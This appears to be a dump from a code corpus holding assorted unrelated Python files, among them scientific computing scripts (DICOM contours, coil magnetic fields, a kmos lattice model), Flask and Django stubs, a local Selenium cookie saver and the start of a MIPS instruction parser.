        [cw, pma] = select_contours(img)
        # Setting which one is the internal / external contour (internal=[0], external=[1]) when needed
        if len(pma) == 2:
            contour_0_len = len(cw[0])
            contour_1_len = len(cw[1])
            # The longer contour is assumed to be the external one.
            if contour_0_len >= contour_1_len:
                cw[0], cw[1] = cw[1], cw[0]
        cw_real = copy.copy(cw)
        # Coordinate system conversion for all contours (DICOM image plane ->
        # patient coordinate system, per the standard mapping equation).
        for contour in cw_real:
            for k in range(len(contour)):
                contour[k] = img_position_pat \
                             + iop1 * pixel_spacing[1] * contour[k][0] \
                             + iop2 * pixel_spacing[0] * contour[k][1]
        contours_list[i] = cw_real
        # Collecting points to skull axial axis and lateral symmetry calculation
        if len(pma) == 2:  # healthy skull slice has outside and inside contours (pixel_mean_array has 2 points)
            # uses the mean point of the external contour (contours are approx. concentric)
            pixel_mean_real = img_position_pat \
                              + iop1 * pixel_spacing[1] * pma[1][0] \
                              + iop2 * pixel_spacing[0] * pma[1][1]
            contours_mean_point_list[i] = pixel_mean_real
            mean_points_real = np.vstack([mean_points_real, pixel_mean_real])
            # Lateral symmetry
            # external_contour_mirrored = mirror_contour_point(cw_real[1][:, 0:2], pixel_mean_real[0:2])
            # T = icp_wrap(cw_real[1][:, 0:2], external_contour_mirrored, debug=True)
            # rotation_info_list.append(T)
    return contours_list
def plot_contours(img, contours):
    """Display the image with every contour from `contours` overlaid.

    :param img: 2D ndarray (a single DICOM slice)
    :param contours: iterable of (N, 2+) arrays of (row, col) points
    """
    # Display the image and plot all contours in a array of contours
    fig, ax = plt.subplots()
    contour_img = ax.imshow(img, interpolation='nearest', cmap=plt.cm.gray, origin='bottom')
    for contour in contours:
        ax.plot(contour[:, 1], contour[:, 0], linewidth=2)  # x and y are switched for correct image plot
    ax.axis('image')
    plt.colorbar(contour_img, ax=ax)
    plt.show()
def main():
    """Load a DICOM series, convert its contours to patient coordinates,
    and plot one contour with a periodic spline fit through it."""
    # NOTE(review): hard-coded absolute Windows path -- works only on the
    # author's machine; consider a CLI argument.
    datasets = load_dicom_folder(r"C:\Users\Escritorio\Dropbox\USP\Projeto Mariana\TestSeries\JLL")
    series_arr, _ = dicom_datasets_to_numpy(datasets)
    contours_list = \
        contours_to_patient_coord_sys_and_points_to_skull_axial_axis(datasets, series_arr)
    # Plots all contours from contours_list
    fig, ax = plt.subplots()
    # Only slice 3, first contour, is actually plotted.
    contour = contours_list[3][0]
    ax.plot(contour[:, 0], contour[:, 1], linewidth=1)
    # Periodic (per=1) spline through the contour, sampled at 1000 points.
    tck, u = splprep(contour.T, u=None, s=0.0, per=1)
    u_new = np.linspace(u.min(), u.max(), 1000)
    x_new, y_new = splev(u_new, tck, der=0)
    ax.plot(x_new, y_new, 'b--')
    # for j in range(len(contours_list)):
    # for contour in contours_list[j]:
    # ax.plot(contour[:, 0], contour[:, 1], contour[:, 2], linewidth=1)
    # ax.set_xlim3d(-200, 200)
    # ax.set_ylim3d(-50, 50)
    # ax.set_zlim3d(100, 200)
    # plt.axis('scaled')
    plt.show()
12,445 | ffb6c37229410ead6b9e91456f3d48c3f12bcc12 | # -*- coding: utf-8 -*-
"""
Created on Fri Apr 8 14:56:45 2016
@author: user
"""
from __future__ import division
from numpy.linalg import solve
import numpy as np
from matplotlib import pyplot as plot
# Model constants.  NOTE(review): domain meaning inferred from names only --
# this looks like a metabolic flux/yield calculation (growth vs maintenance);
# confirm with the author before relying on these labels.
a = 0.12
b = 0.135
g = 1.85
cla = 40
mumax = 0.55
Kp = 4
# Specific rate reduced by an inhibition-style factor (1 + cla/Kp)^-1.
mu = mumax*(1 + (cla/Kp))**-1
thetha = 0.2
# 8x8 coefficient matrix (stoichiometry-like balances).
S = np.matrix([[1+a, 1, 0, 0, 0, 0, 0, 0],
               [0, -1, 1, 1, 0, 0, 0, 0],
               [0, 0, 0, -1, 1, 1, 0, 0],
               [0, 0, 0, 0, 0, -1, 1, 1],
               [0, 0, 0, 0, 0, -1/3, 1, 0],
               [b, 0, -1/3, 1/3, -1/3, 0, 0, -1],
               [-g, -1/3, 0, 2/3, 0, 0, 0, 0],
               [0, 0, 1, 0, 0, 0, 0, 0]])
#
C = np.matrix( [1, 0, 0, 0, 0, 0, 0, 0]).T
# Solve S*Yg = C for the "growth" case.
Yg = solve(S, C)
# NOTE(review): Ysatp_g is computed but never used afterwards.
Ysatp_g=-1/3*Yg[1]+2/3*Yg[3]
# Replace row 7 and re-solve for the "maintenance" case.
S[6] = [1,0,0,0,0,0,0,0]
Ym = solve(S, C)
Ysatp_m=-1/3*Ym[1]+2/3*Ym[3]
# Combined rates: growth-associated term (mu) plus maintenance term (thetha).
r_la = (Yg[4]/Yg[0])*mu + (Ym[4]/Ysatp_m)*thetha
r_et = (Yg[-1]/Yg[0])*mu + (Ym[-1]/Ysatp_m)*thetha
r_s = (1/Yg[0])*mu + (1/Ysatp_m)*thetha
# Overall yields relative to substrate consumption.
Yla_o = r_la/r_s
Yet_o = r_et/r_s
print (Yla_o)
print ()
print (Yet_o)
|
12,446 | 2307621cf512695706c4ceada3fa680e3ce385e9 | import sys
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib.ticker as tk
from matplotlib import gridspec
def field_norm(z_pts: np.ndarray, wire_locations: np.ndarray, p) -> tuple:
    """
    z_pts: an array consisting of points along the z-axis (0, 0, z) for magnetic field calculations,
        shaped (n_points, 1, 1) so it broadcasts against wire_locations
    wire_locations: an array consisting of the z-position of individual coil windings,
        shaped (1, n_windings, 1)
    p: an array consisting of the radius of wire turns within a single groove
        (shape (1, 1, n_loops)), or a scalar radius
    Return the normalized magnetic field and the non-normalized central magnetic field
    """
    mu0 = 4*np.pi*10**(-7)  # permeability of free space
    # On-axis loop field, summed over all windings and loops; both sums
    # collapse to a length-1 (B_c) or length-n (B_z) array.
    B_c = np.sum(mu0*p**2/(p**2 + wire_locations**2)**1.5, axis=(1, 2))/2
    B_z = np.sum(mu0*p**2/(p**2 + (z_pts - wire_locations)**2)**1.5, axis=(1, 2))/2
    # .item() instead of float(): converting a size-1 ndarray with float()
    # is deprecated in recent numpy.
    return B_z/B_c, B_c.item()
def main(path):
    """Compare the axial field profile of a neutron-guide-style (NG) coil
    against solenoid, Helmholtz and Lee-Whiting references of matching
    length or radius, printing a summary table and saving EPS plots."""
    wire_locations = pd.read_csv('{}/wire_locations.csv'.format(path), header=0)
    p = np.array(wire_locations.iloc[0, :-2])  # radii of wire turns in a single groove
    p_avg = np.average(p)  # average radius for comparison with alternative coil designs
    loops = len(p)
    p = p.reshape((1, 1, loops))
    ng_wire_locations = np.array(wire_locations['z'])
    windings = len(ng_wire_locations)
    ng_wire_locations = ng_wire_locations.reshape((1, len(ng_wire_locations), 1))
    end_point = ng_wire_locations[0, -1, 0]
    # solenoid with equal length and radius to ng coil
    sol_wire_locations = np.linspace(-end_point, end_point, windings)
    sol_wire_locations = sol_wire_locations.reshape((1, windings, 1))
    # helmholtz coil with equal length to ng coil
    helm1_wire_locations = np.array([end_point, -end_point])
    helm1_wire_locations = helm1_wire_locations.reshape((1, 2, 1))
    # helmholtz coil with equal radius to ng coil
    helm2_wire_locations = np.array([p_avg/2, -p_avg/2])
    helm2_wire_locations = helm2_wire_locations.reshape((1, 2, 1))
    # lee-whiting coil with equal length to ng coil
    # (9 outer + 4 inner turns per side at the canonical 0.9408R / 0.2432R positions)
    lw1_outer_wire = np.full(9, end_point)
    lw1_inner_wire = np.full(4, 2432*end_point/9408)
    lw1_wire_locations = np.concatenate((lw1_outer_wire, lw1_inner_wire, -lw1_inner_wire, -lw1_outer_wire))
    lw1_wire_locations = lw1_wire_locations.reshape((1, 26, 1))
    # lee-whiting coil with equal radius to ng coil
    lw2_outer_wire = np.full(9, 0.9408*p_avg)
    lw2_inner_wire = np.full(4, 0.2432*p_avg)
    lw2_wire_locations = np.concatenate((lw2_outer_wire, lw2_inner_wire, -lw2_inner_wire, -lw2_outer_wire))
    lw2_wire_locations = lw2_wire_locations.reshape((1, 26, 1))
    calculation_number = 1000  # number of magnetic field calculation points
    z_calc = np.linspace(-end_point, end_point, calculation_number).reshape((calculation_number, 1, 1))  # array of calculation points
    # Note: the reference coils pass a scalar radius to field_norm, relying
    # on numpy broadcasting.
    field_ng, center_ng = field_norm(z_calc, ng_wire_locations, p)
    field_sol, center_sol = field_norm(z_calc, sol_wire_locations, p_avg)
    field_helm1, center_helm1 = field_norm(z_calc, helm1_wire_locations, end_point*2)
    field_helm2, center_helm2 = field_norm(z_calc, helm2_wire_locations, p_avg)
    field_lw1, center_lw1 = field_norm(z_calc, lw1_wire_locations, end_point/0.9408)
    field_lw2, center_lw2 = field_norm(z_calc, lw2_wire_locations, p_avg)
    # Summary table: central field per ampere-turn, coil radius and length.
    print('\n Coil | B(0) (\u03BCT/A*turns) | R (cm) | L (cm)')
    print('--------------------------------------------')
    print(' NG | {:>9.6f} | {:>6.3f} | {:>6.3f}'.format(np.round(center_ng*10**6/(windings*loops), 6), np.round(100*p_avg, 2), np.round(100*end_point, 2)))
    print(' Sol | {:>9.6f} | {:>6.3f} | {:>6.3f}'.format(np.round(center_sol*10**6/windings, 6), np.round(100*p_avg, 2), np.round(100*end_point, 2)))
    print(' H 1 | {:>9.6f} | {:>6.3f} | {:>6.3f}'.format(np.round(center_helm1*10**6/2, 6), np.round(200*end_point, 2), np.round(100*end_point, 2)))
    print(' H 2 | {:>9.6f} | {:>6.3f} | {:>6.3f}'.format(np.round(center_helm2*10**6/2, 6), np.round(100*p_avg, 2), np.round(50*p_avg, 2)))
    print(' LW 1 | {:>9.6f} | {:>6.3f} | {:>6.3f}'.format(np.round(center_lw1*10**6/26, 6), np.round(end_point/0.009408, 2), np.round(100*end_point, 2)))
    print(' LW 2 | {:>9.6f} | {:>6.3f} | {:>6.3f}\n'.format(np.round(center_lw2*10**6/26, 6), np.round(100*p_avg, 2), np.round(94.08*p_avg, 2)))
    # Two stacked panels: equal-length comparisons (top), equal-radius (bottom).
    fig = plt.figure(figsize=(6, 12))
    gs = gridspec.GridSpec(2, 1, hspace=0.025)
    ax = fig.add_subplot(111)  # invisible frame used only for the shared y-label
    ax2 = fig.add_subplot(gs[0])
    ax3 = fig.add_subplot(gs[1])
    ax.spines['top'].set_color('none')
    ax.spines['bottom'].set_color('none')
    ax.spines['left'].set_color('none')
    ax.spines['right'].set_color('none')
    ax.tick_params(labelcolor='w', top=False, bottom=False,
                   left=False, right=False)
    ax.set_ylabel('Normalized Magnetic Field', fontsize=13, labelpad=13)
    ax2.plot(100*z_calc[:, 0, 0], field_ng, label='NG')
    ax2.plot(100*z_calc[:, 0, 0], field_sol, label='Sol', ls='--')
    ax2.plot(100*z_calc[:, 0, 0], field_lw1, label='LW #1', ls=':')
    ax2.plot(100*z_calc[:, 0, 0], field_helm1, label='Helm #1', ls='-.')
    ax2.tick_params(labelsize=13, top=True, right=True,
                    direction='in', which='both')
    ax2.xaxis.set_major_formatter(tk.NullFormatter())
    ax2.legend(loc=8, fontsize=13, handlelength=1)
    ax3.plot(100*z_calc[:, 0, 0], field_ng, label='NG')
    ax3.plot(100*z_calc[:, 0, 0], field_sol, label='Sol', ls='--')
    ax3.plot(100*z_calc[:, 0, 0], field_lw2, label='LW #2', ls=':')
    ax3.plot(100*z_calc[:, 0, 0], field_helm2, label='Helm #2', ls='-.')
    ax3.set_xlabel('z-position (cm)', fontsize=13)
    ax3.tick_params(labelsize=13, top=True, right=True,
                    direction='in', which='both')
    ax3.legend(loc=8, fontsize=13, handlelength=1)
    plt.savefig('{}/field_profile.eps'.format(path), bbox_inches='tight')
    plt.close()
    # Second figure: vertical ticks marking each winding position.
    plt.figure(figsize=(6, 2))
    plt.vlines(100*ng_wire_locations, 0, 1, color='C0')
    plt.xlabel('Wire Positions (cm)', fontsize=13)
    plt.yticks([], [])
    plt.tick_params(labelsize=13, top=True, direction='in', which='both')
    plt.savefig('{}/wire_locations.eps'.format(path), bbox_inches='tight')
    plt.close()
if __name__ == '__main__':
    main(sys.argv[1])
|
12,447 | 30444f1a4133c17d010dbb9ea1aacf0bbac05438 | # 通过用户输入数字计算阶乘
# 获取用户输入的数字
import math
import time
# Time how long it takes to compute num! (factorial of num).
start = time.time()
# num = int(input("请输入一个数字: "))
num = 10000
# Negative numbers have no factorial; 0! is 1; otherwise compute num!.
if num < 0:
    print("抱歉,负数没有阶乘")
elif num == 0:
    print("0 的阶乘为 1")
else:
    # math.factorial replaces the original O(n) pure-Python multiply loop;
    # it runs in C and is drastically faster for large num.
    factorial = math.factorial(num)
    print("%d 的阶乘为 %d" %(num,factorial))
end = time.time()
print('开始毫秒数:', start)
print('结束毫秒数:', end)
print('运行时间:', end - start)
12,448 | d3dddae3eb2349fc039a717d3fa2305c43b5630a | '''tempo=int(input('Quantos anos seu carro tem? '))
if tempo<=3:
print('Carro novo')
else:
print ('Carro velho')
print ('Carro novo' if tempo<=3 else 'Carro velho')'''
'''nome=str(input('Qual seu nome? '))
if nome=='Thiago':
print('Que nome lindo você tem!')
else:
print('Queria que fosse Thiago XD')
print('Bom dia, {} ' .format(nome))'''
# Read two grades from the user and report the average plus pass/fail.
n1=(float(input('Digite a primeira nota ')))  # first grade
n2=(float(input('Digite a segunda nota ')))  # second grade
media=(n1+n2)/2  # simple average of the two grades
print('Sua média foi {} ' .format(media))
# Passing threshold is an average of 6.0 or higher.
if media >=6.0:
    print('Aprovado')
else:
    print('Reprovado, filho da puta! Se fudeu!')
12,449 | 40ef49b2c145dad7626c000a6822ff62bb25f406 | from flask import Flask
from flask import render_template
from flask import redirect
from flask import request
from flask_wtf.csrf import CSRFProtect
from flask_wtf.csrf import CSRFError
import os
app=Flask(__name__)
# --- Authentication pages -------------------------------------------------
@app.route('/login', methods=['GET', 'POST'])
def login():
    return render_template('login.html')
@app.route('/validar_login', methods=['POST'])
def validarLogin():
    # Placeholder: no credential check yet, every POST "succeeds".
    if (request.method == 'POST'):
        return redirect('/')
    else:
        return "ERROR"
@app.route('/recuperar_clave', methods=['GET', 'POST'])
def recuperarClave():
    return render_template('recuperarClave.html')
@app.route('/registro', methods=['GET', 'POST'])
def registro():
    return render_template('registro.html')
@app.route('/privacidad', methods=['GET'])
def privacidad():
    return render_template('privacidad.html')
# --- General pages --------------------------------------------------------
@app.route('/', methods=['GET'])
def index():
    return render_template('index.html')
@app.route('/perfil', methods=['GET'])
def perfil():
    return render_template('perfil.html')
# --- User management (template-only stubs) --------------------------------
@app.route('/agregar_usuario', methods=['GET', 'POST'])
def agregarUsuario():
    return render_template('agregarUsuario.html')
@app.route('/validar_agregar_usuario', methods=['POST'])
def validarAgregarUsduario():
    # NOTE(review): function name has a typo ("Usduario"); harmless since it
    # is only referenced via the decorator, but worth fixing project-wide.
    return redirect('/perfil')
@app.route('/editar_usuario', methods=['GET', 'POST'])
def editarUsuario():
    return render_template('editarUsuario.html')
@app.route('/cambiar_clave', methods=['GET', 'POST'])
def cambiarClave():
    return render_template('cambiarClave.html')
# --- Flights --------------------------------------------------------------
@app.route('/vuelos_asignados', methods=['GET'])
def vuelosAsignados():
    return render_template('vuelosAsignados.html')
@app.route('/vuelos', methods=['GET'])
def vuelos():
    return render_template('vuelos.html')
@app.route('/crear_vuelo', methods=['GET', 'POST'])
def crearVuelo():
    return render_template('crearVuelo.html')
@app.route('/editar_vuelo', methods=['GET', 'POST'])
def editarVuelo():
    return render_template('editarVuelo.html')
@app.route('/eliminar_vuelo', methods=['GET', 'POST'])
def eliminarVuelo():
    return render_template('eliminarVuelo.html')
@app.route('/reservar_vuelo', methods=['GET', 'POST'])
def reservarVuelo():
    return render_template('reservarVuelo.html')
@app.route('/buscar_vuelo', methods=['GET'])
def buscarVuelo():
    return render_template('buscarVuelo.html')
@app.route('/calificar_vuelo', methods=['GET', 'POST'])
def calificarVuelo():
    return render_template('calificarVuelo.html')
@app.route('/gestion_comentario', methods=['GET', 'POST'])
def gestionComentario():
    return render_template('gestionComentario.html')
# --- Dashboards -----------------------------------------------------------
@app.route('/dashboard', methods=['GET'])
def dashboard():
    return render_template('dashboard.html')
@app.route('/dashboard_vuelos', methods=['GET'])
def dashboardVuelos():
    return render_template('dashboardVuelos.html')
@app.route('/dashboard_usuarios', methods=['GET'])
def dashboardUsuarios():
    return render_template('dashboardUsuarios.html')
@app.route('/dashboard_calificaciones', methods=['GET'])
def dashboardCalificaciones():
    return render_template('dashboardCalificaciones.html')
# --- CSRF protection and app startup --------------------------------------
@app.errorhandler(CSRFError)
def handle_csrf_error(e):
    # Render a friendly page for failed/missing CSRF tokens.
    return render_template('csrfError.html', reason=e.description), 400
csrf = CSRFProtect()
csrf.init_app(app)
# NOTE(review): SECRET_KEY is assigned after csrf.init_app(app); this works
# because Flask reads config lazily at request time, but conventionally the
# key should be configured first.  Also, os.urandom regenerates the key on
# every restart, invalidating existing sessions and CSRF tokens.
SECRET_KEY = os.urandom(32)
app.config['SECRET_KEY'] = SECRET_KEY
# NOTE(review): app.run() executes at import time (no __main__ guard) and
# debug=True must not be used in production.
app.run(debug=True)
|
12,450 | ec6d6cd27363cec2beeb0af6edd7f77cf636721b | # 霍夫变换
import cv2
import numpy as np
def drawFindLines(img, lines):
    """Draw every Hough line (given as (rho, theta) pairs) onto img in red."""
    for group in lines:
        for rho, theta in group:
            cos_t = np.cos(theta)
            sin_t = np.sin(theta)
            # Foot of the perpendicular from the origin to the line (x-y coords).
            x0 = cos_t * rho
            y0 = sin_t * rho
            # Two points 1000 px along the line's direction vector (-sin, cos).
            pt1 = (int(x0 - 1000 * sin_t), int(y0 + 1000 * cos_t))
            pt2 = (int(x0 + 1000 * sin_t), int(y0 - 1000 * cos_t))
            cv2.line(img, pt1, pt2, (0, 0, 255), 1)
img = cv2.imread('../Datasets/rand.jpg')
grayImg = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# Edge detection (Canny) before the Hough transform.
edges = cv2.Canny(grayImg, 50, 120, apertureSize=3)
cv2.imshow('cannyImg', edges)
# Detected lines come back as a 3-D array: first axis is the line index,
# innermost pair is (rho, theta); threshold of 250 accumulator votes.
lines = cv2.HoughLines(edges, 1, np.pi/180, 250)
drawFindLines(img, lines)
cv2.imshow('Line', img)
cv2.waitKey(0)
cv2.destroyAllWindows()
12,451 | 1f18d6083a8f94399e50b1786ed098d8060c0f71 | from itertools import product
from kmos.cli import main as cli_main
from kmos.types import Action, Condition, Layer, Project, Site, Species
# Project
pt = Project()
pt.set_meta(
    author='Michael Seibt',
    email='michael.seibt@tum.de',
    model_name='LGD_lateral',
    model_dimension=2
)
# Species
pt.add_species(
    Species(name='empty', color='#d3d3d3'),
    Species(name='ion', color='#0000ff', representation="Atoms('Si')"),
    Species(name='source', color='#00ff00', representation="Atoms('Au')"),
    Species(name='drain', color='#ff0000', representation="Atoms('Ag')")
)
pt.species_list.default_species = 'empty'
# Layer and Coordinates: one 'hollow' site per simple-cubic cell, plus its
# four in-plane neighbors used for nearest-neighbor interactions.
layer = Layer(name='simple_cubic')
layer.add_site(Site(name='hollow', pos='0.5 0.5 0.5'))
pt.add_layer(layer)
center = pt.lattice.generate_coord('hollow')
bottom = pt.lattice.generate_coord('hollow.(0,-1,0)')
top = pt.lattice.generate_coord('hollow.(0,+1,0)')
left = pt.lattice.generate_coord('hollow.(-1,0,0)')
right = pt.lattice.generate_coord('hollow.(+1,0,0)')
# Parameters: barrier E0, temperature, field bias eps_f (left/right
# asymmetry), NN interaction e_int, and source/drain coverages.
pt.add_parameter(name='E0', value=0.5)
pt.add_parameter(name='T', value=300)
pt.add_parameter(name='eps_f', value=0.0, adjustable=True, min=-0.05, max=0.05)
pt.add_parameter(name='e_int', value=0.002, adjustable=True, min=0.00, max=0.01)
pt.add_parameter(name='thetaS', value=1.0, adjustable=True, min=0.0, max=1.0)
pt.add_parameter(name='thetaD', value=0.0, adjustable=True, min=0.0, max=1.0)
# Processes: one diffusion process per hop direction and per configuration
# of the three remaining neighbors (2^3 occupation patterns each).
names = ['top', 'left', 'bottom', 'right']
# Field bias: hops against the field (left) cost +eps_f, with it (right) -eps_f.
delta_Es = ['E0', 'E0+eps_f', 'E0', 'E0-eps_f']
coordinates = [top, left, bottom, right]
for coordinate_name, delta_E, coordinate in zip(names, delta_Es, coordinates):
    for i, conf in enumerate(product(['empty', 'ion'], repeat=3)):
        diffusion_condition = [
            Condition(species='ion', coord=center),
            Condition(species='empty', coord=coordinate)
        ]
        # NOTE(review): the actions list is built from Condition objects; in
        # kmos.types Condition and Action share the same base, so this works,
        # but Action would be clearer -- confirm before changing.
        diffusion_action = [
            Condition(species='ion', coord=coordinate),
            Condition(species='empty', coord=center)
        ]
        # The three neighbors other than the hop target constrain the process.
        temp_coords = coordinates[:]
        temp_coords.remove(coordinate)
        for conf_species, temp_coord in zip(conf, temp_coords):
            diffusion_condition.append(Condition(species=conf_species, coord=temp_coord))
        # Each occupied neighbor lowers the barrier by e_int.
        nns = conf.count('ion')
        pt.add_process(
            name='diffusion_%s_%s' % (coordinate_name, i),
            conditions=diffusion_condition,
            actions=diffusion_action,
            rate_constant='1/(beta*h)*exp(-beta*((%s)-%s*e_int)*eV)' % (delta_E, nns)
        )
        # if left == empty, make another process where condition is left == source
        # important for first step after emission -> otherwise deadlock
        if left in temp_coords:
            left_index = temp_coords.index(left)
            if conf[left_index] == 'empty':
                diffusion_condition = [
                    Condition(species='ion', coord=center),
                    Condition(species='empty', coord=coordinate)
                ]
                for conf_species, temp_coord in zip(conf, temp_coords):
                    if temp_coord == left:
                        conf_species = 'source'
                    diffusion_condition.append(Condition(species=conf_species, coord=temp_coord))
                pt.add_process(
                    name='diffusion_%s_%s_source' % (coordinate_name, i),
                    conditions=diffusion_condition,
                    actions=diffusion_action,
                    rate_constant='1/(beta*h)*exp(-beta*((%s)-%s*e_int)*eV)' % (delta_E, nns)
                )
# Source electrode: ion emission/re-absorption at the left boundary,
# weighted by the source coverage thetaS.
source_entry_conditions = [
    Condition(species='empty', coord=center),
    Condition(species='source', coord=left)
]
source_exit_conditions = [
    Condition(species='ion', coord=center),
    Condition(species='source', coord=left)
]
pt.add_process(
    name='source_entry',
    conditions=source_entry_conditions,
    actions=source_exit_conditions,
    rate_constant='thetaS*1/(beta*h)*exp(-beta*(E0-eps_f)*eV)'
)
pt.add_process(
    name='source_exit',
    conditions=source_exit_conditions,
    actions=source_entry_conditions,
    rate_constant='(1-thetaS)*1/(beta*h)*exp(-beta*(E0+eps_f)*eV)'
)
# Drain electrode: ion collection/re-emission at the right boundary; the
# tof_count entries accumulate the net 'current' observable.
drain_entry_conditions = [
    Condition(species='ion', coord=center),
    Condition(species='drain', coord=right)
]
drain_exit_conditions = [
    Action(species='empty', coord=center),
    Action(species='drain', coord=right)
]
pt.add_process(
    name='drain_exit',
    conditions=drain_entry_conditions,
    actions=drain_exit_conditions,
    rate_constant='(1-thetaD)*1/(beta*h)*exp(-beta*(E0-eps_f)*eV)',
    tof_count={'current': 1}
)
pt.add_process(
    name='drain_entry',
    conditions=drain_exit_conditions,
    actions=drain_entry_conditions,
    rate_constant='thetaD*1/(beta*h)*exp(-beta*(E0+eps_f)*eV)',
    tof_count={'current': -1}
)
# Build model
file_name = pt.meta.model_name + '.xml'
pt.save(file_name)
if False:  # build the exported .xml directly
    cli_main('export %s' % file_name)
pt.print_statistics()
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
import json

# Launch a visible Chrome session, let the user log in by hand, then dump
# the session cookies to cookies.json for later reuse.
opts = Options()
# opts.add_argument('--headless')
# opts.add_argument('--disable-gpu')
browser = webdriver.Chrome(chrome_options=opts)
browser.get("http://www.openedv.com/")

# Block until the user confirms login is complete.
input("get_cookies?")

# Fetch the cookies (list of dicts) and serialize them to a JSON string.
cookie_json = json.dumps(browser.get_cookies())

# Persist the cookies to a local file.
with open('cookies.json', 'w') as f:
    f.write(cookie_json)
12,453 | 0bfb6a1589509a90f955c3a1a2691cd9bd2715e3 | from django.contrib import admin
from .models import Funcionario
class ListandoFuncionarios(admin.ModelAdmin):
    """Admin changelist for Funcionario showing name, user and company columns."""
    list_display = ('nome', 'user', 'empresa')
# Register the model with its customized admin view.
admin.site.register(Funcionario, ListandoFuncionarios)
|
12,454 | 3e958900a8a04d13965418defeddd9d938d73998 | import os
# Interactively report basename / dirname / splitext for each path typed in.
# Fixes: bare `except:` (which also swallowed KeyboardInterrupt, making the
# loop hard to interrupt mid-handler) narrowed to Exception, and the
# "unknown durname" message typo corrected.
while 1:
    text = input()
    try:
        print('basename = ' + os.path.basename(text))
    except Exception:
        print('unknown basename')
    try:
        print('dirname = ' + os.path.dirname(text))
    except Exception:
        print('unknown dirname')
    try:
        print('splitext = ' + str(os.path.splitext(text)))
    except Exception:
        print('unknown splitext')
12,455 | c26775426d34ebaa8ec5264d9b4d26263bb931ca | # Generated by Django 3.2.2 on 2021-06-16 19:12
from django.db import migrations, models
import django_fsm
class Migration(migrations.Migration):
    """Auto-generated by Django 3.2.2: relabels the review (`_status`) and
    report fields on the curation/edition/verification models and their
    historical copies. Do not hand-edit the field definitions below."""
    dependencies = [
        ('main', '0007_rename_proxy_container_ip_containerinfo_proxy_container_address'),
    ]
    operations = [
        migrations.AlterField(
            model_name='curation',
            name='_status',
            field=django_fsm.FSMField(choices=[('new', 'New'), ('incom_materials', 'Incomplete Materials'), ('major_issues', 'Major Issues'), ('minor_issues', 'Minor Issues'), ('no_issues', 'No Issues')], default='new', help_text='Was the submission approved by the curator', max_length=15, verbose_name='Review'),
        ),
        migrations.AlterField(
            model_name='curation',
            name='report',
            field=models.TextField(default='', verbose_name='Details'),
        ),
        migrations.AlterField(
            model_name='edition',
            name='_status',
            field=django_fsm.FSMField(choices=[('new', 'New'), ('issues', 'Issues'), ('no_issues', 'No Issues')], default='new', help_text='Was the submission approved by the editor', max_length=15, verbose_name='Review'),
        ),
        migrations.AlterField(
            model_name='edition',
            name='report',
            field=models.TextField(default='', verbose_name='Details'),
        ),
        migrations.AlterField(
            model_name='historicalcuration',
            name='_status',
            field=django_fsm.FSMField(choices=[('new', 'New'), ('incom_materials', 'Incomplete Materials'), ('major_issues', 'Major Issues'), ('minor_issues', 'Minor Issues'), ('no_issues', 'No Issues')], default='new', help_text='Was the submission approved by the curator', max_length=15, verbose_name='Review'),
        ),
        migrations.AlterField(
            model_name='historicalcuration',
            name='report',
            field=models.TextField(default='', verbose_name='Details'),
        ),
        migrations.AlterField(
            model_name='historicaledition',
            name='_status',
            field=django_fsm.FSMField(choices=[('new', 'New'), ('issues', 'Issues'), ('no_issues', 'No Issues')], default='new', help_text='Was the submission approved by the editor', max_length=15, verbose_name='Review'),
        ),
        migrations.AlterField(
            model_name='historicaledition',
            name='report',
            field=models.TextField(default='', verbose_name='Details'),
        ),
        migrations.AlterField(
            model_name='historicalverification',
            name='_status',
            field=django_fsm.FSMField(choices=[('new', 'New'), ('not_attempted', 'Not Attempted'), ('minor_issues', 'Minor Issues'), ('major_issues', 'Major Issues'), ('success_w_mod', 'Success W Mod'), ('success', 'Success')], default='new', help_text='Was the submission able to be verified', max_length=15, verbose_name='Review'),
        ),
        migrations.AlterField(
            model_name='historicalverification',
            name='report',
            field=models.TextField(default='', verbose_name='Details'),
        ),
        migrations.AlterField(
            model_name='verification',
            name='_status',
            field=django_fsm.FSMField(choices=[('new', 'New'), ('not_attempted', 'Not Attempted'), ('minor_issues', 'Minor Issues'), ('major_issues', 'Major Issues'), ('success_w_mod', 'Success W Mod'), ('success', 'Success')], default='new', help_text='Was the submission able to be verified', max_length=15, verbose_name='Review'),
        ),
        migrations.AlterField(
            model_name='verification',
            name='report',
            field=models.TextField(default='', verbose_name='Details'),
        ),
    ]
|
12,456 | 141c47f9f9a12d70aa0bd918f28739c355b62b53 | #!/usr/bin/env python
import sys
sys.path.insert(1,"/Users/edelman/Documents/programming/alignio-maf")
sys.path.insert(1,"/Users/edelman/Documents/programming/bcbb/gff")
from Bio import AlignIO
from Bio.AlignIO import MafIO
from BCBio import GFF
#mafFile=sys.argv[1]
#gffFile=sys.argv[2]
#sequence=sys.argv[3]
# Hard-coded inputs (Python 2 script; the CLI arguments above are commented out).
gff = "data/Hmel2.gff"
maf="data/subTree_18Genomes_Hmel201001.maf"
gff_handle = open(gff)
sequence="HmelRef.Hmel201001"
# Build (or load) a MAF index keyed on the reference sequence name.
mafIndex=MafIO.MafIndex("trial.mafIndex",maf,sequence)
# Restrict GFF parsing to exon features on the target scaffold.
limit_info = dict(
        gff_id = [sequence.split(".")[1]],
        gff_type = ["exon"])
mafs=[]
for rec in GFF.parse(gff_handle, limit_info=limit_info):
    for i in range(len(rec.features)):
        print rec.features[i].location.start, rec.features[i].location.end
        #search=mafIndex.search([rec.features[i].location.start],[rec.features[i].location.end])
        #for align in search:
        #    print align
gff_handle.close()
# NOTE(review): `mafs` is never populated (the search code above is commented
# out), so `mafs[0]` below raises IndexError and the write loop never runs —
# confirm whether the search block should be re-enabled before use.
m=mafs[0]
for i,m in enumerate(mafs):
    theseMafs=[align for align in m]
    AlignIO.write(theseMafs,open("Hmel201001_exonMafs"+str(i)+".maf","w"),"maf")
def getGenes(maf,gff):
    # NOTE(review): unfinished stub — GFF.parse() is called without its
    # required handle argument and `feats` is never used or returned.
    feats=GFF.parse()
|
12,457 | ea05f6c995aadc2384a7a23234f0a6eb9c7da631 | import argparse
class Parser:
    """Translates tokenized MIPS instructions into 32-bit binary strings.

    Each handler appends its encoding to ``result``. A handler given the
    wrong number of operands first appends the joined raw tokens and then
    still attempts the encoding (original error-reporting behaviour,
    preserved).  NOTE(review): negative branch offsets are not encoded
    correctly (bin() of a negative int) — also preserved from the original.
    """

    def __init__(self):
        self.result = []

    def _field(self, token, width=5):
        "Zero-padded binary string of the integer contained in *token*."
